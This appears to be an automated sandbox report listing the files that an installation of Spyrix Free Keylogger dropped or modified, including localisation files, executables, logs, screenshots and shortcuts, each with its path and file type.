Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-30VPI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-3NGF2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4HFAD.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4VNHB.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-64G2E.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-84S39.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-AJ2I6.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-D55ON.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ELOCA.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-F1C0A.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-I60JV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ISN8T.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-J7F78.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-U6894.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-V8QER.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VEUU5.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VTN2G.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-0QN1F.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5C81D.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5NG0A.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-6GDRB.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-6HIEM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-C3L0A.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-E3876.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FG2VS.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-IMAT0.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JK8CM.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-K8S8R.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LPHVO.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LQH6B.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MJ2IR.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MOAPH.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MPKJU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-N043V.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-1OS4I.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-2CIAP.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-63S21.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-86TIC.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-HI18P.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-HSVHP.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-J0QFK.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-J91JT.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-U4DSN.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-ASQ85.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-DUO5D.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-LVQVH.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-26FV7.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-7NMJI.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-JJ85I.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231571 bytes, 841618\37\user\37, C:\ProgramData\Security Monitor\{827D21CC-
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
SQLite 3.x database, last written using SQLite version 3013000, file counter 11, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 11
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
SQLite Rollback Journal
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0082221528.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0083447685.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:11:15 2024, mtime=Wed Oct 2 03:11:25 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
Generic INItialization configuration [System]
modified
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-ONQ42.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-VFID4.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-VNNEC.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-3MVAE.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-93JLK.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-CBJT8.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:11:15 2024, mtime=Wed Oct 2 03:11:15 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 2 03:11:14 2024, mtime=Wed Oct 2 03:11:14 2024, atime=Wed Oct 2 03:10:31 2024, length=1308909, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_6E3F587357F4ED7D7098E81DD0F931D7
ASCII text, with very long lines (426), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_6E3F587357F4ED7D7098E81DD0F931D7
ASCII text, with very long lines (420), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_6E3F587357F4ED7D7098E81DD0F931D7
ASCII text, with very long lines (413), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7
ASCII text, with very long lines (417), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 10
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
SQLite Rollback Journal
dropped
C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
